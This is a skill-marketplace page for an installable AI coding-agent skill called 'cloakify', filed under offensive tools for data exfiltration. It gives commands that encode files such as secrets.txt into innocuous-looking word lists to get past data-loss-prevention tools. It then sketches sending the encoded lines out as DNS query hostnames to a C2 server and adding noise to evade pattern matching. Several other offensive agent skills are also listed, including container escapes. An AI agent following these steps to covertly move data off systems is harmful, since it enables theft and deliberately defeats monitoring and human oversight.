offensive-tools/data-exfiltration/cloakify/SKILL.md
Exfiltrate data by encoding it as innocuous-looking strings (tweets, chess moves, cat names). Use when needing to bypass DLP tools by disguising exfiltrated data as benign traffic or files.
npx skillsauth add aeondave/malskill cloakifyInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Data exfiltration via steganographic encoding — disguise payloads as benign content.
git clone https://github.com/TryCatchHCF/Cloakify
cd Cloakify
# Encode file into disguised output
python cloakify.py payload.zip ciphers/desserts.ciph > exfil.txt
# Decode on attacker side
python decloakify.py exfil.txt ciphers/desserts.ciph > payload.zip
| Command | Purpose |
|---------|---------|
| cloakify.py <file> <cipher> | Encode payload with cipher |
| decloakify.py <file> <cipher> | Decode back to original |
| listCiphers.py | Show available ciphers |
| addNoise.py | Add noise lines to output |
| removeNoise.py | Strip noise before decoding |
desserts · movies1984 · chessOpenings · twitterFavoriteEmoji · ATampTAreaCodes · geo_lattitude
Exfil over DNS (combine with dnscat):
# 1. Encode
python cloakify.py secrets.txt ciphers/desserts.ciph > encoded.txt
# 2. Paste each line as DNS query hostname
# 3. Decode on C2
python decloakify.py captured.txt ciphers/desserts.ciph
Add noise to evade pattern matching:
python cloakify.py payload.zip ciphers/movies1984.ciph | python addNoise.py 10 > noisy.txt
python removeNoise.py noisy.txt 10 | python decloakify.py /dev/stdin ciphers/movies1984.ciph
| File | When to load |
|------|--------------|
| references/ | Cipher creation guide |
development
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
development
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
devops
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.